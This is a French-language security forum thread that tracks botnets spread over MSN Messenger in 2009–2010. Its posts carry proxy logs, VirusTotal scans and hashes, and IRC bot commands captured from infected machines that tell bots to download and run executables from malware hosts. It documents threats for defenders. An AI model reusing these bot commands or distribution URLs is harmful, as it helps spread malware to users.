MSN et infections liées

Informations sur les arnaques et Virus sur MSN.
Malekal_morte
Messages : 113139
Inscription : 10 sept. 2005 13:57

MSN et infections liées

par Malekal_morte »

Depuis quelques mois, les infections MSN qui auparavant étaient assez passives si ce n'est le téléchargement de quelques stealer pour voler des mots de passe FTP, de serials de jeux et parfois un peu de Vundo pour monétiser.

Depuis quelques mois, la donne a changé et les infections MSN se sont rapprochés très certains d'autres groupes (probablement russes) et les infections installés sur le botnet sont plus virulentes.

Régulièrement maintenant ce sont des infections plus difficile à éradiquer toujours dans le but de monétiser : Se reporter à ce topic de remontés pour voir l'évolution : http://forum.malekal.com/215-226-t17551.html

Aujourd'hui c'est tout simplement un rogue qui a été fait télécharger au botnet :

Code : Tout sélectionner

1245318592.315   1661 192.168.1.200 TCP_MISS/200 335 GET http://theinstalls.com/files
1245318995.774    865 192.168.1.200 TCP_MISS/200 26229 GET http://best-fotos.com/install_133db.exe - DIRECT/216.39.57.104 application/octet-stream
Le domaine best-fotos.com étant déjà utilisé pour propager des infections MSN, se reporter à cette page : http://forum.malekal.com/http-best-foto ... 19634.html

Le rogue installé est System Security

L'internaute se retrouve alors avec joli fond d'écran noir et un message en rouge :
YOUR COMPUTER IS INFECTED WITH SPYWARE!
YOUR'RE IN DANGER!
Image

Vous trouverez une description plus détaillée de cette infection sur cette page : http://forum.malekal.com/besthandycap-c ... ml#p153374
Fichier install_133db.exe reçu le 2009.06.18 09:52:45 (UTC)
Situation actuelle: terminé
Résultat: 5/41 (12.20%)
Formaté Formaté
Impression des résultats Impression des résultats
Antivirus Version Dernière mise à jour Résultat
a-squared 4.5.0.18 2009.06.18 -
AhnLab-V3 5.0.0.2 2009.06.18 -
AntiVir 7.9.0.191 2009.06.18 -
Antiy-AVL 2.0.3.1 2009.06.18 -
Authentium 5.1.2.4 2009.06.17 -
Avast 4.8.1335.0 2009.06.17 -
AVG 8.5.0.339 2009.06.17 -
BitDefender 7.2 2009.06.18 -
CAT-QuickHeal 10.00 2009.06.18 (Suspicious) - DNAScan
ClamAV 0.94.1 2009.06.18 -
Comodo 1361 2009.06.18 -
DrWeb 5.0.0.12182 2009.06.18 -
eSafe 7.0.17.0 2009.06.17 Suspicious File
eTrust-Vet 31.6.6566 2009.06.17 -
F-Prot 4.4.4.56 2009.06.17 -
F-Secure 8.0.14470.0 2009.06.18 -
Fortinet 3.117.0.0 2009.06.18 -
GData 19 2009.06.18 -
Ikarus T3.1.1.59.0 2009.06.18 -
Jiangmin 11.0.706 2009.06.18 -
K7AntiVirus 7.10.766 2009.06.17 -
Kaspersky 7.0.0.125 2009.06.18 -
McAfee 5649 2009.06.17 -
McAfee+Artemis 5649 2009.06.17 -
McAfee-GW-Edition 6.7.6 2009.06.18 Trojan.LooksLike
Microsoft 1.4701 2009.06.18 TrojanDownloader:Win32/Dontovo.A
NOD32 4166 2009.06.18 -
Norman 6.01.09 2009.06.17 -
nProtect 2009.1.8.0 2009.06.18 -
Panda 10.0.0.14 2009.06.17 -
PCTools 4.4.2.0 2009.06.17 -
Prevx 3.0 2009.06.18 -
Rising 21.34.32.00 2009.06.18 -
Sophos 4.42.0 2009.06.18 -
Sunbelt 3.2.1858.2 2009.06.18 MSAntispyware 2009 (v)
Symantec 1.4.4.12 2009.06.18 -
TheHacker 6.3.4.3.348 2009.06.17 -
TrendMicro 8.950.0.1094 2009.06.18 -
VBA32 3.12.10.7 2009.06.18 -
ViRobot 2009.6.18.1793 2009.06.18 -
VirusBuster 4.6.5.0 2009.06.17 -
Information additionnelle
File size: 25600 bytes
MD5 : b34da3df8edb4eb3b7159b5ffbbc9f64
SHA1 : 59f780167866d2dea1901e417c3f94064e900e2c
Fichier dailybucks_install_2_.exe reçu le 2009.06.18 10:10:52 (UTC)
Situation actuelle: terminé
Résultat: 12/41 (29.27%)
Formaté Formaté
Impression des résultats Impression des résultats
Antivirus Version Dernière mise à jour Résultat
a-squared 4.5.0.18 2009.06.18 Trojan.Win32.Winwebsec!IK
AhnLab-V3 5.0.0.2 2009.06.18 -
AntiVir 7.9.0.191 2009.06.18 TR/Crypt.ZPACK.Gen
Antiy-AVL 2.0.3.1 2009.06.18 -
Authentium 5.1.2.4 2009.06.17 -
Avast 4.8.1335.0 2009.06.17 -
AVG 8.5.0.339 2009.06.17 Adload_r.JS
BitDefender 7.2 2009.06.18 -
CAT-QuickHeal 10.00 2009.06.18 -
ClamAV 0.94.1 2009.06.18 -
Comodo 1362 2009.06.18 -
DrWeb 5.0.0.12182 2009.06.18 -
eSafe 7.0.17.0 2009.06.17 -
eTrust-Vet 31.6.6566 2009.06.17 -
F-Prot 4.4.4.56 2009.06.17 -
F-Secure 8.0.14470.0 2009.06.18 Trojan-Dropper.Win32.Agent.atmg
Fortinet 3.117.0.0 2009.06.18 -
GData 19 2009.06.18 -
Ikarus T3.1.1.59.0 2009.06.18 Trojan.Win32.Winwebsec
Jiangmin 11.0.706 2009.06.18 -
K7AntiVirus 7.10.766 2009.06.17 -
Kaspersky 7.0.0.125 2009.06.18 Trojan-Dropper.Win32.Agent.atmg
McAfee 5649 2009.06.17 FakeAlert-DZ
McAfee+Artemis 5649 2009.06.17 FakeAlert-DZ
McAfee-GW-Edition 6.7.6 2009.06.18 Trojan.Crypt.ZPACK.Gen
Microsoft 1.4701 2009.06.18 VirTool:Win32/Obfuscator.FR
NOD32 4166 2009.06.18 -
Norman 6.01.09 2009.06.17 -
nProtect 2009.1.8.0 2009.06.18 -
Panda 10.0.0.14 2009.06.17 -
PCTools 4.4.2.0 2009.06.17 -
Prevx 3.0 2009.06.18 -
Rising 21.34.32.00 2009.06.18 Trojan.Win32.FakeAV.nz
Sophos 4.42.0 2009.06.18 -
Sunbelt 3.2.1858.2 2009.06.18 MalwareDoctor
Symantec 1.4.4.12 2009.06.18 -
TheHacker 6.3.4.3.348 2009.06.17 -
TrendMicro 8.950.0.1094 2009.06.18 -
VBA32 3.12.10.7 2009.06.18 -
ViRobot 2009.6.18.1794 2009.06.18 -
VirusBuster 4.6.5.0 2009.06.17 -
Information additionnelle
File size: 505662 bytes
MD5 : 468dfbf92d5ed72b2861f5f932dae0af
SHA1 : 841f2db4edd660fb0f207c3729bad62fa5d20ae1
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas !
Comment protéger son PC des virus
Windows 11 : Compatibilité, Configuration minimale requise, télécharger ISO et installer Windows 11

Comment demander de l'aide sur le forum
Partagez malekal.com : n'hésitez pas à partager les articles qui vous plaisent sur la page Facebook du site.
Haut
Malekal_morte
Messages : 113139
Inscription : 10 sept. 2005 13:57

Re: MSN et infections liées

par Malekal_morte »

Pour supprimer les infections MSN, suivre la procédure donnée dans ce lien : https://www.malekal.com/VIRUS_MSN.php
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas !
Comment protéger son PC des virus
Windows 11 : Compatibilité, Configuration minimale requise, télécharger ISO et installer Windows 11

Comment demander de l'aide sur le forum
Partagez malekal.com : n'hésitez pas à partager les articles qui vous plaisent sur la page Facebook du site.
Haut
Malekal_morte
Messages : 113139
Inscription : 10 sept. 2005 13:57

Re: MSN et infections liées

par Malekal_morte »

Depuis quelques jours, le botmaster fait télécharge une autre infection assez connu et répandu de type msa.exe / sshnas.dll

Code : Tout sélectionner

PRIVMSG \.. :[GET]: . http://root.denirulz.org/~denirulz/xd/install.52018.exe to: C:\DOCUME~1\Robert\LOCALS~1\Temp\58.exe..

Code : Tout sélectionner

PRIVMSG #bb# :[GET]: . http://dvdflashworld.com/install.52018.exe to: C:\DOCUME~1\Robert\LOCALS~1\Temp\72.exe..

Code : Tout sélectionner

1268161028.296  66271 192.168.1.200 TCP_MISS/200 101183 GET http://bigvideofiles.com/install.52018.exe - DIRECT/64.120.141.6 application/x-msdownload
1268165981.904  56813 192.168.1.200 TCP_MISS/200 101183 GET http://dvdflashworld.com/install.52018.exe - DIRECT/64.120.141.6 application/x-msdownload

Code : Tout sélectionner

1268166209.852  90815 192.168.1.200 TCP_MISS/200 101201 GET http://root.denirulz.org/%7Edenirulz/xd/install.52018.exe - DIRECT/93.174.93.46 application/x-msdownload
1268166228.096  60859 192.168.1.200 TCP_MISS/200 101201 GET http://93.174.94.86/%7Edenirulz/xd/install.52018.exe - DIRECT/93.174.94.86 application/x-msdownload
Done !
MD5 :
Date : ___
Results :
Virus Names :
Permalink : http://www.virustotal.com/analisis/cd4a ... 1268158051

The results for install.52018.exe are :
Symantec 20091.2.0.41 2010.03.09 Suspicious.Insight
Sophos 4.51.0 2010.03.09 Mal/EncPk-MP
Panda 10.0.2.2 2010.03.09 Suspicious file
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas !
Comment protéger son PC des virus
Windows 11 : Compatibilité, Configuration minimale requise, télécharger ISO et installer Windows 11

Comment demander de l'aide sur le forum
Partagez malekal.com : n'hésitez pas à partager les articles qui vous plaisent sur la page Facebook du site.
Haut
Malekal_morte
Messages : 113139
Inscription : 10 sept. 2005 13:57

Re: MSN et infections liées

par Malekal_morte »

Code : Tout sélectionner

1268176237.121  45341 192.168.1.200 TCP_MISS/200 74064 GET http://93.174.94.86/%7Edenirulz/xd/cash.exe - DIRECT/93.174.94.86 application/x-msdownload
Done !
MD5 : ebc88477f4d24db02b0dd4b4171d9339
Date : 2010.03.09 20:54:34 (UTC)
Results : 2/42
Virus Names : Suspicious.Insight Suspicious file
Permalink : http://www.virustotal.com/analisis/b646 ... 1268168074

The results for cash.exe are :
Panda 10.0.2.2 2010.03.09 Suspicious file
Symantec 20091.2.0.41 2010.03.09 Suspicious.Insight
On retrouve le pack même que Trojan.MicroJoin voir : http://forum.malekal.com/trojan-microjo ... 23813.html

Image
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas !
Comment protéger son PC des virus
Windows 11 : Compatibilité, Configuration minimale requise, télécharger ISO et installer Windows 11

Comment demander de l'aide sur le forum
Partagez malekal.com : n'hésitez pas à partager les articles qui vous plaisent sur la page Facebook du site.
Haut
Malekal_morte
Messages : 113139
Inscription : 10 sept. 2005 13:57

Re: MSN et infections liées

par Malekal_morte »

Infection MSN de ce topic : http://forum.malekal.com/tinyurl-com-fa ... 26025.html
neptune:/tmp# wget tinyurl.com/facebook-photos-30-05-2010-JPG
--2010-05-30 13:03:01-- http://tinyurl.com/facebook-photos-30-05-2010-JPG
Résolution de tinyurl.com... 195.66.135.138, 195.66.135.140
Connexion vers tinyurl.com|195.66.135.138|:80...connecté.
requête HTTP transmise, en attente de la réponse...301 Moved Permanently
Emplacement: http://p8.hostingprod.com/@myfaceblog.o ... 164483.SCR [suivant]
--2010-05-30 13:03:01-- http://p8.hostingprod.com/@myfaceblog.o ... 164483.SCR
Résolution de p8.hostingprod.com... 67.195.140.36
Connexion vers p8.hostingprod.com|67.195.140.36|:80...connecté.
requête HTTP transmise, en attente de la réponse...200 OK
Longueur: 126976 (124K) [application/octet-stream]
Saving to: `PHOTO-JPG-54927164483.SCR'

100%[====================================================================================================================================================>] 126 976 134K/s in 0,9s

2010-05-30 13:03:03 (134 KB/s) - PHOTO-JPG-54927164483.SCR sauvegardé [126976/126976]

qui ajoute cette clef au registre et le fichier :
O4 - HKLM\..\Run: [Windows System Guard] C:\Documents and Settings\robert\Application Data\msng.exe
qui va chercher ces fichiers :

Code : Tout sélectionner

:[email protected] PRIVMSG n[FRA|XP]8413981 :.dl http://you2323.net/asd1.exe..:[email protected] PRIVMSG n[FRA|XP]8413981 :.dl http://you2323.net/asd.exe..

Code : Tout sélectionner

1275217415.688    865 192.168.1.222 TCP_MISS/200 83880 GET http://you2323.net/asd1.exe - DIRECT/206.188.192.116 application/x-msdownload
1275217416.217    530 192.168.1.222 TCP_MISS/200 22951 GET http://you2323.net/asd.exe - DIRECT/206.188.192.116 application/x-msdownload
1275217446.143  15993 192.168.1.222 TCP_MISS/200 876335 GET http://96.0.203.114/foto21.rar - DIRECT/96.0.203.114 application/octet-stream
Voir détection sur ces topics :
http://forum.malekal.com/http-you2323-n ... 26017.html
http://forum.malekal.com/http-you2323-n ... 26016.html

Ce qui donne :
Image

et au final, on obtient le rogue Antispyware Soft
Image

URL associées au rogue :

Code : Tout sélectionner

1275218084.131    140 192.168.1.100 TCP_REFRESH_HIT/200 563 GET http://antispy-guide.com/check?pgid=1 - DIRECT/188.65.74.166 application/octet-stream
1275218265.356    934 192.168.1.94 TCP_MISS/200 102832 GET http://mirkinodeswrs.net/l.php?i=1 - DIRECT/89.111.177.27 application/octet-stream
1275218329.127    164 192.168.1.222 TCP_MISS/200 565 GET http://antispy-guide.net/check?pgid=1 - DIRECT/91.216.73.48 application/octet-stream
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas !
Comment protéger son PC des virus
Windows 11 : Compatibilité, Configuration minimale requise, télécharger ISO et installer Windows 11

Comment demander de l'aide sur le forum
Partagez malekal.com : n'hésitez pas à partager les articles qui vous plaisent sur la page Facebook du site.
Haut
Malekal_morte
Messages : 113139
Inscription : 10 sept. 2005 13:57

Re: MSN et infections liées

par Malekal_morte »

http://forum.malekal.com/http-rs766tl4- ... 29842.html

Infection MSN qui intalle le rogue à la mode ThinkPoint
Vous ne pouvez pas consulter les pièces jointes insérées à ce message.
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas !
Comment protéger son PC des virus
Windows 11 : Compatibilité, Configuration minimale requise, télécharger ISO et installer Windows 11

Comment demander de l'aide sur le forum
Partagez malekal.com : n'hésitez pas à partager les articles qui vous plaisent sur la page Facebook du site.
Haut
  • Sujets similaires
    Réponses
    Vues
    Dernier message

Revenir à « Vers/Virus MSN et arnaques sur MSN »